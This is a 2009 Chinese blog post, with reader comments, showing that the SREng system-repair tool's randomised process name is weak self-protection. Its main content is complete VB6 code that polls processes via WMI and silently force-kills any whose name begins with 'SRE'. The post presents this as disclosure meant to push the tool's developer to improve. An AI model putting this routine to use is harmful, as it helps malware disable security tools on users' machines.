百度空间 | 百度首页 
 
查看文章
 
病毒可轻松干掉SREng
2009-04-24 00:04

      每次使用SREng都会看到它释放并启动一个副本,副本以随机的大写字母和数字为窗口标题,该副本映像名是“SRE########.exe”,########是由随机小写字母和数字组成的8字节。当进程启动后会写注册表标志,用于在每次启动时判断是否有异常退出。这一系列动作无非是为了防止恶意程序的攻击,但事实上却并不理想,方法有多种,这里我围绕映像名来做示范。

      病毒的特点是要求代码精炼且执行效率高,以VB为例,以下为完整代码,经测试通过。

+++++++++++++++++++++++++++++++++++++++++
'code by Tored
'Blog: http://hi.baidu.com/peaset
Private Sub Form_Load()
Timer1.Interval = 10000
'间隔10秒,足够了
End Sub

Private Sub Timer1_Timer()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ps = objWMIService.ExecQuery("Select * from Win32_Process")
For Each p In ps '遍历进程
If Left(p.Name, 3) = "SRE" Then Shell "taskkill /f /im " & p.Name, vbHide '判断进程,调用taskkill
Next
End Sub
+++++++++++++++++++++++++++++++++++++++++

      期待Smallfrogs尽早提升SREng的抗杀能力。本帖将继续关注。


类别:安全知识 | 添加到搜藏 | 浏览() | 评论 (9)
 
最近读者:
 
网友评论:
1
2009-04-24 14:01 | 回复
挺强啊~~
 
2
2009-04-25 10:51 | 回复
厉害!
 
3
2009-04-25 17:42 | 回复
公布这没意思哦
 
4
2009-04-25 19:46 | 回复
vb写得额!
哈哈·
 
5
2009-04-25 21:36 | 回复
是的,我也奇怪,以前版本不是这么做的啊
能解释一下??
 
6
2009-04-29 10:44 | 回复
还没看到病毒利用这个

现在扫描日志的东西可多了
 
7
2009-04-29 12:35 | 回复
回复81552640:
现在有太多的病毒通过IFEO劫持SREng。虽然说现在也有很多的系统扫描工具,但是恐怕还是SREng最吃香。呵呵~
 
8
2009-04-30 11:25 | 回复
恩 毕竟 SREng 名声在外!
 
9
2009-07-12 01:08 | 回复
干掉SREng进程很容易,最有兴趣的是你可以试试干掉SREng的桌面扫描,呵呵
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu